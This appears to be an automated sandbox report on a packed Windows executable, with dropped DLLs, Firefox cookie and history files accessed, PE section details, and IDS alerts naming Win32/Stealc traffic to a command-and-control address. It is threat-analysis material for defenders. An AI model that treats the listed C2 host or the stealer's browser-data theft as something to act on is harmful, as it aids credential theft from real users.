Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947298841409289
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'868'800 bytes
MD5:	4bc4838890f52b86e8595449e053c634
SHA1:	bf434e7f111d0e8d9d87a244d781848f1d7de5e2
SHA256:	79791ed8ffba9931905a146913ac240bee35a0a5025e3070ff3e90200b1e91b0
SHA512:	1041b3c3401e82e8665d81c6a742cba4ac6ae114b78d791479b9412ae78d20ec461ee13ed83f95d5a0eb17a62a30b397e4d8ec617a8c4729a7daa75e15628013
SSDEEP:	49152:Y7QiQZyMnXP2/xrQfXjn342X6CyREW4Iex15AsZhJ51z0P:Y7RsP2/Oj3B7IEv1Zxx0P
TLSH:	2385337B587B5150CDCF013743FE2D25EDE0A22A8A8E90683A9F95AC1857DF13C6F152
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xaac000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2F75160BBAh
punpckldq mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2F75162BB5h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	c219dde2c2823bd6c25cf2193686ea00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2aa000	0x200	755703406d8469b8cf8ad12f8fa87d62	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jsfsowjs	0x508000	0x1a3000	0x1a2200	edbb94b31952749e2d8cdf1cb113bc73	False	0.9946614583333333	data	7.953425032944427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bgqvnsxf	0x6ab000	0x1000	0x400	8bc68bb815c6d632b3c129a9b763c95d	False	0.787109375	data	6.156968598239671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6ac000	0x3000	0x2200	4aad680ec4d13fdd1619a02b2327b509	False	0.05583639705882353	DOS executable (COM)	0.6352975110812021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T05:21:04.277751+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:04.566633+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:04.602525+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-25T05:21:04.879938+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:04.887618+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-10-25T05:21:05.979482+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:06.507465+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:12.129929+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:13.369258+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:14.113653+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:14.756075+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:16.190511+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-25T05:21:16.676134+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 05:21:02.734839916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:03.077426910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:03.077887058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:03.077980042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:03.083380938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:03.979990959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:03.980196953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:03.982623100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:03.988034010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.277571917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.277750969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.278753042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.285646915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.566432953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.566507101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.566632986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.566632986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.597058058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.602524996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879740953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879841089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879856110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879872084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879887104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879901886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879915953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:04.879937887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.879939079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.879939079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.879939079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.879939079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.880034924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.882119894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:04.887618065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.164068937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.164268017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:05.181284904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:05.181286097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:05.186733961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.186748981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.186814070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.186825991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.186851978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.186865091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.979388952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:05.979481936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.226475954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.232312918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507191896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507251978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507286072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507338047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507464886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507466078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507466078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507466078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507497072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507554054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507590055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507642984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507711887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507745981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507781029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.507951975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.507951975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.508562088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.508595943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.508630037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.508793116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.508793116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.508794069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.664877892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.664902925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.664918900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.664935112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.664973974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.664973974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.665035963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.665079117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.665095091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.665096045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.665115118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.665153027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.665153027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.665180922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.665985107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666044950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666083097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666119099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:06.666142941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:06.666153908 CEST	80	49730	185.215.113.37	192.168.2.4
